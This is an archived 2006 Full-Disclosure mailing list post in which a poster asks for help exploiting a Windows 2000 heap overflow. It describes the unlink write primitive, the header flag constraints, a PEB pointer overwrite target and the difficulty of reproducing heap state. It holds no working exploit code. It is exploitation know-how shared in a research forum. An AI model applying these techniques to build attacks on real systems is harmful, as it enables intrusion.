lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Date: Tue, 1 Aug 2006 07:46:23 +1200 (NZST)
From: Ivan Stroks <ivanstroks@...oo.co.nz>
To: full-disclosure@...ts.grok.org.uk
Subject: Exploiting heap overflows in W2K

Hi list,
 
  I am trying to exploit a Heap buffer overflow vulnerability and facing some problems, hope you could help.
  I run the vulnerable program in a VMWare, attached with Olly.
 
  These are my problems:
 
  1. I control both EAX and ESI, when the program goes to 
 
     mov [esi], eax
     mov [eax + 4], esi
 
     First of all, I tried gainig control of execution through PEB but, according to Halvar's presentation, there are some restrictions to what you can write in the header of the overflowed buffer.
     Quoting: 
     
     " Properties our block must have:
 
         Bit 0 of Flags must be set
         Bit 3 of Flags must be set
         Field_4 must be smaller than 0x40
         The first field (own size) must be larger than 0x80
 
         The block ‘XXXX99XX’ meets all  requirements"
 
     So, supposing PEB pointer to overwrite is 0x7FFDF020 I would need to specify for example: XXXX20f0fd7f, but this is not matching required properties and so RtlFreeHeap exits.
     I am sure I must be missing something here, but can't find it.
 
  2. An aditional problem I am facing, due to the fact that this is my first heap overflowing session, is that when I trigger the vulnerability as soon as the programs comes back from "revert snapshot" then I get to rtlHeapFree ok, but if some other request are performed to the program before, then I cannot reproduce that behaviour again and different behaviours and situation arise.
    It is obvious that my exploit won't be the first request the program receives so, how can I manage this?
 
 
    Hope you could help!
    Regards
 
 IvaN!
 
 
 Send instant messages to your online friends http://au.messenger.yahoo.com 
Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ